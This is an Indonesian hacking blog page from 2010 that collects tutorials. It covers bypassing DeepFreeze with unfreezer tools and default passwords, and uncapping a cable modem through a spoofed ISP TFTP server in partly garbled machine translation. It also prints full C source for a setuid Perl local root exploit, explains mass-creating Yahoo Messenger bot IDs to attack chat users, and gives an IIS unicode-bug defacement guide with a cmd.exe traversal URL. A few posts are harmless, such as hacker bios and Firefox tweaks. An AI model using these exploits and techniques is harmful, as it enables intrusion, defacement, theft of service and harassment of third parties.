Live Traffic Feed

Sabtu, 03 April 2010

membuka komputer yang terproteksi deepfreeze

UNTUK DEEPFREEZE VERSI 5 KE BAWAH
Ini kejadian yang aku alami waktu menjadi admin. Untuk melindungi komputer dari tangan-tangan jahil, agar settingnya tidak berubah akhirnya saya kunci semua komputer dg program Deep Freeze (cukup membantu memang). Pada suatu waktu saya mau menginstall software baru, tapi .. saya lupa password untuk membuka program Deep Freeze tersebut, mau install semua komputer dari awal kelamaan. Akhirnya dapat pemecahannya untuk membuka program tersebut tanpa perlu tau passwordnya.
nah utk yg enterprise coba uninstallnya lewat safe mode
Nggak semua deep freeze bisa di thawed pake Unfreezer
cuman yg versi ini aja:
Deep Freeze versions 5.20.* and 5.30.*
* Deep Freeze versions 3.32.*
Caranya sbb :

1. Download dulu software unfreezer untuk membobol program DeepFreeze di http://newsoftwarelist.com/utilities/deep-freeze-unfreezer/kalau link tidak bisa pakek yang ini http://www.unfreezer.cjb.net/,atau http://usuarios.arnet.com.ar/fliamarconato/pages/DeepUnfreezer1.6.exe
2. Terus jalankan program UnFreezer , program tersebut akan mendeteksi dg otomatis apakah ada program DeepFreeze apa tidak
3. Lalu tinggal pilih anda mau membuka proteksi komputer tersebut dg memilih Thawed ato tidak.
4. Klo udah restart komputernya (udah kebuka DeepFreeze nya :)

Semoga pengalaman ini bisa membantu teman2 yang komputernya terDeepFreeze. Memalukan !!? masak admin sampe upa passwordnya :)
Untuk yang masli asli DeepFreezenya alian belum diutak atik Deepfreeze
pass terbentuk sesuai dengan installernya jadi bukan ditentukan awal
penginstallan. Untuk mengubahnya ya mesti tahu pass yg terbentuk
sewaktu penginstallan.
Menurut pass standard deepfreeze yg pernah saya gunakan coba pakai :
1. 123456
2. deepfreeze
3. 9E55B787
UNTUK DEEPFREEZE VERSI 6 KE ATAS
Cara 1
1. Siapkan CDROM dan CD Installer Windows XP nya
2. Atur First Boot priority nya menjadi CD-ROM
3. Restart Kompi dan pilih boot from CD-ROM
4. Ikuti langkah2 seperti pada saat install Windows
5. Sampai pada bagian Enter to Setup Enterlah lalu tekan F8 untuk persetujuan dan tunggu beberapa saat
6. Lalu tekan R untuk repair (Repair Setup)
7. Selanjutnya ikuti langkah2 install windows berikutnya sampe selese.
8. Sekarang siapkan DeepFreeze v.6 nya dan double klik
9. Maka akan muncul jendela unInstall DeepFreeze dan lakukan proses uninstall sampai selese
10. Udah dech :]
Cara 2
Untuk UnDeepFreeze for DeepFreeze Standart v6.30
http://www.ziddu.com/download/4075332/UnDeepFreezev2.5.exe.html
note : Jangan d gunakan untuk berbuat jahil .. !!!
Continue reading...

Hacker Paling Hebat..

1.Jonathan James

James adalah orang Amerika, saat baru umur 16 taun dia dikirim ke penjara karena kelakuannya di dunia maya. Situs departemen pertahanan Amerika dibobol olehnya dan dia cuma bilang itu tantangan bagi dia dan merupakan suatu kesenangan tersendiri. NASA juga terkena dampak keisengan dia, James mencuri software NASA yang diperkirakan seharga $1.7 juta dollar AS. Sehingga NASA dipaksa untuk mematikan server dan sistemnya. Karena kelakuannya, dia juga tidak boleh menyentuh komputer selama 10 tahun. Tapi sekarang dia sudah di jalan yang benar dan bikin sebuah perusahaan keamanan di bidang komputer.
2.Adrian Lamo

Dia membobol New York Times untuk mendapatkan info personal dan beberapa security number dan membobol Microsoft. Dia akhirnya didenda $65.000 dollar US. Saat ini dia jadi pembicara di beberapa acara seminar.
3.Kevin Mitnick

Inilah legenda hidup yang saat ini benar-benar mantap dalam dunia hack.
Inilah kelakuan dia:
-Menggunakan Los Angeles bus transfer system buat mendapatkan tumpangan gatis
-Mengelabui FBI
-Hacking kedalam DEC system (Digital Equipment Corporation)
-Mendapatkan administrator positon dalam satu komputer IBM biar menang judi, karena adminnya yang punya laptop IBM tersebut
-Hacking Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens systems
Dan masih banyak lagi kelakuan dia yang luar biasa.
seorang white hat hacker pun yang bernama Tsutomu Shimomura pun (ahli juga dia dan merupakan top 5 white hat hacker), dihack komputer systemnya, dan terjadilah perang luar biasa. Dia dilacak dan ditangkap oleh FBI dengan bantuan Tsutomu Shimomura yang melacak (tracking) lewat jaringan HP’ yang dibawa ama Mitnick saat itu. Tapi sekarang dia sudah tobat dan menjadi seorang penulis buku, konsultan security, dan pembicara.
4.Kevin Poulsen

Juga dikenal dengan Dark Dante. Dia menghack database FBI. Selain itu dia juga menghack seluruh lines phone station karena Memang kemahiran dia menghack lewat phone lines. Saat ini dia jadi senior editor di Wired News, dan berhasil menangkap 744 penawaran sex melalui profiles Myspace.
5.Robert Tappan Moris

6.Karl Koch

Dia berasal dari hannover Jerman yang menamakan komputernya FUCKUP (First Universal Cybernetic-Kinetic Ultra-Micro Programmer). Dia melakukan beberapa keberhasilan dalam menghack pada kurun waktu 1985-1988. Dia juga seorang cocaine addict.
Dia berhasil membobol beberapa sistem militer AS dan menghack sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hack’annya dijual ke KGB (Agen Rahasia Uni Soviet). Dia ditemukan tewas pada tahun 1988, menurut info dia membakar tubuhnya sendiri, namun siapa tahu ini merupakan konspirasi tingkat tinggi antara US dan Soviet pada perang dingin.
Continue reading...

Trik Supaya Modem Lebih Cepet

Hack Modem Anda dan Meningkatkan Kecepatan download dari 64Kbps Sampai sesuai Harapan Anda. Sebagian besar dari kita akan merasa bahwa kecepatan berselancar yang dialokasikan oleh ISP kami tidak cukup...

Tutorial ini akan mengajarkan anda cara meningkatkan 64Kbps link ke 512Kbps atau what ever kecepatan yang Anda inginkan.

Hal ini sangat mungkin untuk melakukan hal ini. Dengan sedikit keberuntungan jika anda Cable Internet Service Provider sangat biadab tentang bagaimana teknologi baru ini sangat berhasil dan meninggalkan beberapa loopholes buka kunci bagi Anda untuk ambil informasi penting tentang cara untuk menyelesaikan tugas ini. Tapi tutorial ini tidak akan menjamin 100% keberhasilan Anda.

Baiklah kita mulai. Saya akan mencoba untuk menjelaskan Anda sebagai terbaik yang saya dapat melakukannya untuk kembali mengkonfigurasi Anda SB5100, SB4100 atau SB3100 modem kabel

Teori kabel modem bekerja

Semua kabel modem ketika boot up akan mencari seorang "Image file" di mana anda semua konfigurasi seperti batas kecepatan upload dan download adalah batas kecepatan ditetapkan. Ini "Image file" disimpan di ISP `s TFTP server. Modem akan dikonfigurasi dengan pra-ISP `s TFTP alamat IP server dan nama file gambar untuk di-download. Apabila modem boot itu atas permintaan TFTP server dan men-download file gambar dari server TFTP ini sesuai dengan batas kecepatan ini kami akan menetapkan.

Misi Kami

Gambar ini mendapat file dari ISP `s TFTP server, reconfigure itu menurut kami perlu dan memaksa kami modem untuk men-download file ini dari komputer daripada mendownloadnya dari ISP` s TFTP server.

Langkah-langkah untuk menyelesaikan

1). USB modem mendapatkan alamat MAC
2). ISP Anda mendapatkan alamat IP server TFTP
3). Dapatkan nama dan path dari "file konfigurasi" atau file foto yang disimpan di ISP `s TFTP server.
4). Download Image file dari ISP `s TFTP server.
5). Decrypt dengan file foto yang anda download dari ISP `s TFTP server
6). Memodifikasi file foto
7). Mengenkripsi file foto yang dimodifikasi
8 ). Mengubah komputer Anda sama dengan konfigurasi TCP ISP `s TFTP Server (yaitu alamat IP sama dengan ISP` s TFTP server)
9). TFTP host server di komputer Anda
10). Letakkan file gambar dalam direktori dasar yang Anda TFTP
11). Restart modem
12). Changer PC IP kembali sebagai yang diberikan oleh ISP
13). Selesai OOPS. Mulai berselancar dengan kecepatan baru


1). USB modem mendapatkan alamat MAC

Anda bisa melihat bagian belakang modem untuk mendapatkan Alamat MAC ini atau Anda dapat logon ke Cable modem dengan Web Browser hxxp: / / 192.168.100.1 /. Internal ini adalah halaman HTML Anda disimpan DOCsis kabel modem (SB5100, SB4100 dan SB3100) yang memberikan anda lebih banyak informasi mengenai konfigurasi penting. Kecuali dimatikan oleh ISP Anda. Fitur ini mungkin totally dimatikan oleh ISP Anda.

2). ISP Anda mendapatkan alamat IP server TFTP
3). Dapatkan nama dan path dari "file konfigurasi" atau file foto yang disimpan di ISP `s TFTP server.

Untuk mendapatkan informasi ini penting Anda harus melakukan SNMP mudah modem Anda. Untuk melakukan hal ini anda dapat menggunakan salah satu dari alat-alat di bawah ini

a) Terdapat sebuah program bernama Aneh QUERY.EXE dari Solusi yang merupakan permintaan BOOTP paket program yang akan Anda kirim segalanya yang perlu Anda ketahui, tanpa semua ini langkah-langkah ekstra. Akan menampilkan file gambar, alamat server TFTP, semua yang benar-benar Anda butuhkan untuk memulai. Untuk menggunakan alat ini BOOTP QUERY, anda memerlukan alamat MAC dari modem kabel

Atau

Para ahli dapat menggunakan program Solarwinds SNMP

Atau

c) Beginners DOCSIS Diagnosis dapat menggunakan utilitas

Atau

d) Beginners dapat menggunakan Alat SNMPWALK

menggunakan perintah "snmpwalk 192.168.100.1 publik"

CATATAN: Penggunaan alamat IP modem sebagai "192.168.100.1" (SB5100, SB4100 dan SB3100) ketika diminta untuk memberikan oleh salah satu dari alat-alat di atas. SNMP masyarakat "Umum"

Menggunakan alat-alat di atas Anda akan mendapatkan informasi dari ISP `s IP server TFTP dan nama" Image file "yang disimpan di server TFTP
Semua informasi penting yang disimpan dalam file ini, Salah satu yang menjadi MaxRateDown 2621440; MaxRateUp 393216;. (Ini adalah pengaturan ISP saya. Anda dapat melihat yang mirip dengan apa yang saya mendapatkan kecepatan. 40KB / s ke atas dan 250 KB / s down)

Di antara ini, yang kami butuhkan adalah:
Konfigurasi server TFTP = 194 .*.*.. 90 (mengganti ini dengan yang anda inginkan di seluruh doc)
= Nama file konfigurasi isrr.bin (ganti dengan yang anda inginkan selama ini di doc)
Dan
Fragmen IP dibuat = 0
IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx
IP address.192.168.100.1 = 192.168.100.1 (alamat IP kabel modem, (mengganti ini dengan yang anda inginkan di seluruh doc)
IP-ke-Jika-index.10.xxx.xxx.xxx = 2

Saran: Anda dapat melakukan langkah ini oleh sniffing modem yaitu "192.168.100.1" modem ketika boot up. Saya tidak pernah mencoba metode ini. Coba luck.


4). Download Image file dari ISP `s TFTP server.

Untuk melakukan hal ini bisa anda gunakan command prompt dan perintah di bawah ini dengan tanda kutip keluar dan bracket.


"C: \ TFTP-i GET"

Okay sekarang anda mendapat file gambar dari ISP `s TFTP server.


5). Decrypt dengan file foto yang anda download dari ISP `s TFTP server
6). Memodifikasi file foto
7). Mengenkripsi file foto yang dimodifikasi

Docsis menggunakan alat yang dapat Anda download dari
CODEhttp: / / sourceforge.net / projects / docsis

menggunakan program ini Anda dapat decrypt file gambar mengubah kecepatan upload dan kecepatan download, menyimpan dan mengenkripsi kembali. Ubah nama file ini baru dibuat sama dengan file gambar asli Anda.


8 ). Mengubah komputer Anda sama dengan konfigurasi TCP ISP `s TFTP Server (yaitu alamat IP sama dengan ISP` s TFTP server)

Pergi ke tempat saya jaringan dan klik kanan -> properties
Pilih LAN Card klik kanan -> properti-> Internet Protocol (TCP-IP) double klik dan mengubahnya ke nilai-nilai sebagai berikut
Mengkonfigurasi TPC dari TCP pengaturan sebagai berikut
IP: 194 .*.*. 90 (ganti dengan TFTP server dari ISP)
Netmask: 255.255.255.0
Gateway: 192.168.100.1 (ganti dengan modem kabel alamat IP)

Catatan: Gateway harus 192.168.100.1 maka hanya modem Anda dapat berkomunikasi dengan komputer.


9). TFTP host server di komputer Anda
10). Letakkan file gambar dalam direktori dasar yang Anda TFTP
11). Restart modem

Download software dan TFTP Server TFTP host server di komputer Anda
Anda dapat men-download dari server TFTP:
CODEftp: / / ftp.ida.net/pub/wireless/tftpd32.exe

Mulai TFTPD32 server. Menuju ke Pengaturan dan Pengamanan untuk mengatur Kosong. Meningkatkan timeout untuk 20secs dan Max Retransmit ke 6. Memilih untuk menterjemahkan file UNIX. Make sure it's base direktori untuk tempat isrr.bin adalah (misalnya file gambar yang akan diubah). Jika Anda perlu replikasi direktori pathname beserta file gambar, kemudian membuat sebuah direktori akar dari yang berkaitan dengan file gambar pathname.

Restart modem Anda, dan AS SOON sebagai SEND cahaya berjalan solid, Anda akan melihat menerima pada server TFTP yakni PC


12). Changer PC IP kembali sebagai yang diberikan oleh ISP
13). Selesai OOPS. Mulai berselancar dengan kecepatan baru

Sekarang Anda mengubah pengaturan TCP PC kembali normal seperti yang diberikan oleh ISP. (I.e. Tempatkan alamat IP Anda yang asli dan gateway)

Oops Anda hacked modem Anda. Uji oleh men-download beberapa file menggunakan memancing (download accelerator plus)

Catatan: kecepatan ini akan tetap sama sampai Anda me-restart modem kabel. Jadi setiap kali Anda reboot modem, anda harus mengikuti langkah-langkah 8,9,10,11 dan 12
Continue reading...

Daftarkan Blog keSearch Engine

Siapa yang tidak kenal dengan search engine Google, Yahoo, Bing. 3 search engine diatas yang harus sobat fokuskan untuk promosi blog. Dari statistik, saat ini Google adalah search engine yang paling banyak digunakan orang untuk mencari kata kunci atau keyword.

Dalam tulisan ini saya tidak akan menjelaskan secara detail bagaimana cara mengoptimalkannya, tapi sobat akan saya jelaskan tentang bagaimana cara melakukan promosi blog ke Google, Yahoo dan Bing.

I. Cara daftar ke Google !

Bisa dibilang Google adalah rajanya Search Engine, saya sangat menyarankan sobat untuk mendaftarkan blog sobat pertama kali di Google.


Untuk cara mendaftarnya arahkan ke http://www.google.com/addurl atau klik disini. Pada halaman formulir pendaftaran, isi alamat blog sobat dan beri komentar sesuai tema blog sobat, kemudian klik tombol Add Url.

google

II. Cara Daftar ke Yahoo !

Untuk mendaftarkan blog sobat ke Yahoo, syaratnya harus sudah punya account Yahoo terlebih dahulu. Kalau sobat sudah punya account di Yahoo, silahkan tuju halaman http://siteexplorer.search.yahoo.com/submit atau langsung saja klik disini. Kemudian untuk mengisi formulir pendaftarannya, perhatikan dua kolom isian yang di sediakan oleh Yahoo.

Kolom yang pertama sobat bisa isikan alamat Website atau Blog sobat, seperti ini contohnya :

http://www.namablog.blogspot.com

Kolom yang kedua sobat bisa isikan alamat sitemap sobat, contoh :

http://www.namablog.blogspot.com/atom.xml

Kemudian klik Submit.

yahoo



III. Cara Daftar ke Bing !

Search Engine bing cukup lumayan banyak dipergunakan orang sebagai mesin pencari, jadi saya sarankan sebisa sobat daftarkan juga blog sobat ke bing.
Silahkan tuju halaman http://www.bing.com/docs/submit.aspx?FORM=WSDD2 atau langsung saja klik disini.


Kemudian pada halaman formulir, isi kode verifikasi dan sobat diminta memasukkan alamat blog sobat.

bing

Silahkan dicoba, semoga blog sobat segera terindeks di Google, Yahoo dan Bing.

Read more: http://www.tiimhacker.co.cc/2010/03/tim-hacker-muslim-siapa-yang-tidak.html#ixzz0kATzrX63
Continue reading...

Jumat, 02 April 2010

Hack Firefox: Secret of About:Config [2]

Hack Firefox: Secret of About:Config [2]

18 September 2008
Penulis: saputra · Kategori Artikel: Hacking, Tutorial
Binus Hacker Sponsor Banner


Speed up page display

Some of the more recent Firefox customizations I’ve examined are ways to speed up the rendering of Web pages. The settings to do this are a little arcane and not terribly self-explanatory, but with a little tinkering, you can often get pages to pop up faster and waste less time redrawing themselves.

Start rendering pages faster
Creating an nglayout.initialpaint.delay integer preference lets you control how long Firefox waits before starting to render a page. If this value isn’t set, Firefox defaults to 250 milliseconds, or 0.25 of a second. Some people report that setting it to 0 — i.e., forcing Firefox to begin rendering immediately — causes almost all pages to show up faster. Values as high as 50 are also pretty snappy.

Reduce the number of reflows
When Firefox is actively loading a page, it periodically reformats or “reflows” the page as it loads, based on what data has been received. Create a content.notify.interval integer preference to control the minimum number of microseconds (millionths of a second) that elapse between reflows. If it’s not explicitly set, it defaults to 120000 (0.12 of a second).

Too many reflows may make the browser feel sluggish, so you can increase the interval between reflows by raising this to 500000 (500,000, or 1/2 second) or even to 1000000 (1 million, or 1 second). If you set this value, be sure to also create a Boolean value called content.notify.ontimer and set it to true.

Control Firefox’s ‘unresponsive’ time
When rendering a page, Firefox periodically runs a little faster internally to speed up the rendering process (a method Mozilla calls “tokenizing”), but at the expense of being unresponsive to user input for that length of time. If you want to set the maximum length of time any one of these unresponsive periods can be, create an integer preference called content.max.tokenizing.time.

Set this to a multiple of content.notify.interval’s value, or even the same value (but higher is probably better). If you set this to something lower than content.notify.interval, the browser may respond more often to user input while pages are being rendered, but the page itself will render that much more slowly.

If you set a value for content.max.tokenizing.time, you also need to create two more Boolean values — content.notify.ontimer and content.interrupt.parsing — and set them both to true.

Control Firefox’s ‘highly responsive’ time
If Firefox is rendering a page and the user performs some kind of command, like scrolling through a still-loading page, Firefox will remain more responsive to user input for a period of time. To control how long this interval is, create an integer preference called content.switch.threshold.

This is normally triple the value of content.notify.interval, but I typically set it to be the same as that value. Set it to something very low — say, 10000 (10,000 microseconds) — and the browser may not respond as snappily, but it may cause the rendering to complete more quickly.

If you haven’t already created the Boolean values content.notify.ontimer and content.interrupt.parsing and set them both to true in conjunction with content.max.tokenizing.time, you’ll need to do so to make content.switch.threshold work properly.

If you are more inclined to wait for a page to finish loading before attempting to do anything with it (like scroll through it), you can set content.max.tokenizing.time to a higher value and content.switch.threshold to a lower value to allow Firefox to finish rendering a page faster at the expense of processing user commands. On the other hand, if you’re the kind of person who likes to scroll through a page and start reading it before it’s done loading, you can set content.max.tokenizing.time to a lower value and content.switch.threshold to a higher one, to give you back that much more responsiveness at the cost of page-rendering speed.
Continue reading...

- Root Exploit -

Bentuk dari exploit itu adalah seperti ini

/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF – kf_lists[at]secnetops[dot]com – 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/

Lho ID nya dah root?? xD.. Untuk kernel yang lainnya juga tidak jauh berbeda

Hehehe… Monggo silakan di cari local root exploit yang lain ya
#define PRELOAD “/etc/ld.so.preload”
#include
#include

int main(int *argc, char **argv)
{

FILE *getuid;
if(!(getuid = fopen(“/tmp/getuid.c”,”w+”))) {
printf(“error opening file\n”);
exit(1);
}

fprintf(getuid, “int getuid(){return 0;}\n” );
fclose(getuid);

system(“cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so
/tmp/getuid.c -lc”);

putenv(“PERLIO_DEBUG=”PRELOAD);
umask(001); // I’m rw-rw-rw james bitch!
system(“/usr/bin/sperl5.8.4″);
FILE *ld_so_preload;

char preload[] = {
“/tmp/getuid.so\n”
};

if(!(ld_so_preload = fopen(PRELOAD,”w+”))) {
printf(“error opening file\n”);
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}

dikutip dari http://www.k-otik.com/exploits/20050207.ex_perl.c.php
untuk menyelesaikanya ada dengan cara :
1. boot pake knoppix atau linux rescue
2. trus cari file dengan nama file /etc/ld.so.preload
3. dalam file tersebut isinnya /tmp/getuid.so
4. kalo ada file tersebut hapus ajah jagn ragu2
5. setelah itu boot lage dari harddisk, ngga perlu diinstall ulang

jadi cara kerja dari exploit itu adalah ketika kita booting dia akan mencara file /tmp/getuid.so yang padahal sebenarnya emang ngga ada …. jadi hati hati dengan exploit ini… kalo emang ngga mao dibuat bingung ….

jadi buat temen temen sekalian yang udah ngebantu saya ucapkan terima kasih banyak :) :D
Continue reading...

Membuat ID Boot (Bot) Yahoo Messenger

Layaknya sebuah Negara atau kerajaan yang ingin maju perang, tentunya anda harus menyiapkan amunisi dan prajurit atau tentara yang akan bertempur di medan juang. Jika anda seorang pemberontak atau mafia, anda tentu harus menyiapkan anak buah anda beserta persenjataannya untuk menghadapi musuh anda atau lawan anda. Dalam membalas serawan lawan di dunia Yahoo Messenger, ID Boot (Bot) mutlak diperlukan sebagai prajurit atau peluru untuk menyerang sang lawan. Software Boot sebagai sebuah mesin perang membutuhkan amunisi untuk menembak lawan. Amunisi ini tidak lain tidak bukan adalah ID Boot (Bot). Boot biasanya meload ID Boot (Bot) yang sudah terdaftar di Server Yahoo untuk aktifitas perangnya. Dengan demikian anda musti membuat prajurit anda terlebih dahulu terdaftar ke Om Yahoo sebagai lahan peperangan. Layaknya perang Barathayuda prajurit anda musti masuk ke medan pertempuran sebelum mampu bertempur menghadapi musuh yang semakin mendekat. Bagaimana cara mendaftarkan ID Boot (Bot) anda.1. Anda bisa membuat ID Boot (Bot) seperti ketika anda membuat ID chat anda. Dengan demikian untuk 1 Prajurit atau 1 bot anda musti mendaftar cukup lama dengan mengikuti segala macam prosedur yang musti dijalankan. Memasukkan kode, mengetikkan nama, dan sebagainya. Satu catatan buat anda, jangan menjadikan ID chatting sehari-hari anda menjadi ID Boot (Bot) atau anda login ke Boot anda. Hal ini menghindari kemungkinan terjadinya larangan dari Pihak Yahoo. Istilah kerennya ID anda kena ban dari yahoo sehingga ID anda tidak dapat digunakan kembali. Ulangi langkah membuat ID itu sampai secukupnya. Semakin banyak semakin baik. Boot bisa meload ID Boot (Bot) sampai 1000 ID, bahkan ada yang sampai 10.000. Wah anda tentunya akan kecapekan membuat ID Boot (Bot) jika mencapai 1000. Berapa banyak waktu yang anda habiskan di depan komputer yang terhubung ke dunia maya hanya untuk membuat ID Boot (Bot) sampai 1000 buah. Capeek bukan. Nah untuk menghindari hal ini dibuatlah software khusus untuk membuat ID Boot (Bot).
2. Carilah Software ID Creator di situs boot maupun situs anti boot. Setelah mendapatkannya jalankan di komputer anda dan jangan lupa cek koneksi internet anda. Dengan menggunakan ID Creator anda hanya perlu menuliskan nama ID Boot (Bot) dan password saja. Dan serahkanlah semua tetek bengek pendaftaran ke medan tempur Yahoo kepada ID Creator tersebut. Biasanya ID Creator membuat boot dengan memberikan Opsi ID Boot (Bot) seperti ini: boot1, boot2, boot3, dan seterusnya. Passwordnya agar lebih mudah disamakan saja. Namun dengan menggunakan ID Boot (Bot) yang identik satu sama lain dan hanya dibedakan dengan angka biasanya anti boot akan segera mengenali dan kemudian memasukkannya dalam kategori boot dan segera dibuang jauh-jauh. Biasanya ID Boot (Bot) seperti ini sangat mencolok apabila di login ke Chat Room. Namun kelebihan dari ID dengan cara seperti ini adalah kemudahan membuatnya.

Setelah anda selesai membuat ID Boot (Bot) tersebut jangan lupa untuk menyimpan nama ID Boot (Bot) anda beserta paswordnya di Note Pad. Software Boot membutuhkan ID Boot (Bot) anda beserta passwordnya ketika meload atau melogin boot lewat note pad. Save dan kasih nama file tersebut dengan nama sesuka anda. Bisanya sih dikasih nama Bots. Tampilan di Note Pad adalah seperti ini:

Bot1:Passwordnya
Bot2:Passwordnya
Bot3:Passwordnya
Dst..

Lebih jelasnya saya berikan ID Boot (Bot) yang pernah saya gunakan dahulu:

manusia_laut:******
rumput_laut_merah:******
rumput_teki_menyakitkan:******
babi_gila_amuk:******
kepala_pecah_seribu:******
seribu_hantu:******
jangkrik_mati:******
celeng_mengamuk:******
srigala_lapar_mengamuk:******
nendang_perut:******
mulut_buaya:******
lidah_neraka:******
lahar_merapi_merah:******
terkaman_singa:******
neraka_durhaka:******
surga_panas:******
geraman_guntur:******
sujud_dusta:******
telinga_kentut:******
sembayang_terlaknat:******
gelisah_pencarian:******
guntur_meledak:******
gembira_tersenyum:******
dst…

****** merupakan password untuk masing-masing ID Boot (Bot), dalam contoh saya diatas password untuk masing-masing ID Boot (Bot) berbeda satu sama lainya. Sedangkan gembira_tersenyum, guntur_meledak, dst merupakan ID Boot (Bot). Agar lebih indah dan memiliki estetika tertentu, ubahlah nickname boot anda dan perhiaslah dengan “membatiknya”. Lihat tulisan saya yang lain soal membatik ID. Jika anda menerima ID Boot (Bot) dengan nama-nama diatas, bisa dipastikan itu berasal dari saya. Namun anda jangan khawatir, saya tidak akan menggunakannya lagi kok. Paling banter cuma saya buat chatting biasa aja kok. Kalau lagi kumat males pake ID yang biasanya. Anda juga bisa menggunakan cara yang paling sering digunakan oleh para booter:

modaro_kowe_cah01:bootersejati
modaro_kowe_cah02:bootersejati
modaro_kowe_cah03:bootersejati
modaro_kowe_cah04:bootersejati
modaro_kowe_cah05:bootersejati
modaro_kowe_cah06:bootersejati
modaro_kowe_cah07:bootersejati
modaro_kowe_cah08:bootersejati
modaro_kowe_cah09:bootersejati
modaro_kowe_cah10:bootersejati
dan seterusnya…

“modaro_kowe_cah01”.. dst merupakan ID Boot (Bot) sedangkan “bootersejati” merupakan passwordnya. Pemisah antara ID Boot (Bot) dan passwordnya ada juga yang memakai spasi atau ; atau yang lainnya. Tergantung dari software boot. Eh, tadi cuma contoh loch, jangan coba diloginkan ke ym, entar anda menyesal karena gak bisa login.
Bots dengan contoh seperti ini paling mudah dikenali oleh anti boot.

Jangan login dengan banyak-banyak ID Boot (Bot) jika koneksi anda lemah atau lelet, bisa-bisa anda disconnect sendiri nanti. Semakin banyak Bot yang di login semakin lama juga anda mempersiapkan diri melakukan penyerangan karena Bot membutuhkan waktu untuk mempersiapkan amunisinya. Sesuaikan banyak sedikitnya Id yang pengen di login dengan koneksi internet anda :)

Ini sekedar info. Mohon jangan disalah gunakan.
Semoga bermanfaat.
Continue reading...

Deface Website – Via URL – Windows Version

Zzzz….. *Clink* “We Come Back” (((dolby stereo))) pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya?? pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ? hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat ato bahkan berlipat-lipat . Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali kontoversi baik positif/negatif, posting kali ini bukannya ngajarin kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen berbagi pengetahuan saja ga` ada motif laen dan kita juga ga menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu awal dari kehancuran kita sendiri dan nantinya dimintai pertanggung-jawaban dari semua itu.

Aduh, koq jadi ngelantur gini ya ) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita “Resiko Ditanggung Masing – Masing”. Pada posting ini kita coba membahas “deface website” apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface…heheheh. Banyak yang bertanya “gimana sich nge-deface situs?” proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :

1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Sayah tidak akan menjelaskan panjang lebar mengenai “unicode bug” ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau …ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK…mari kita mulai…Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)…key nya terserah
kowe…..Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0…Kita scan terlebih dahulu di www.netcraft.com……dapat site yah..??…Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 …Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc….coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan ehehhehehhee…contoh:
http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR …
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface…

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu “http://www.targethost.com”
· Bagian exploit string, yaitu “/scripts/..%255c..%255c”
· Bagian folder, yaitu “/winnt/system32/”
· Bagian command, yaitu “cmd.exe?/c+dir+c:\”

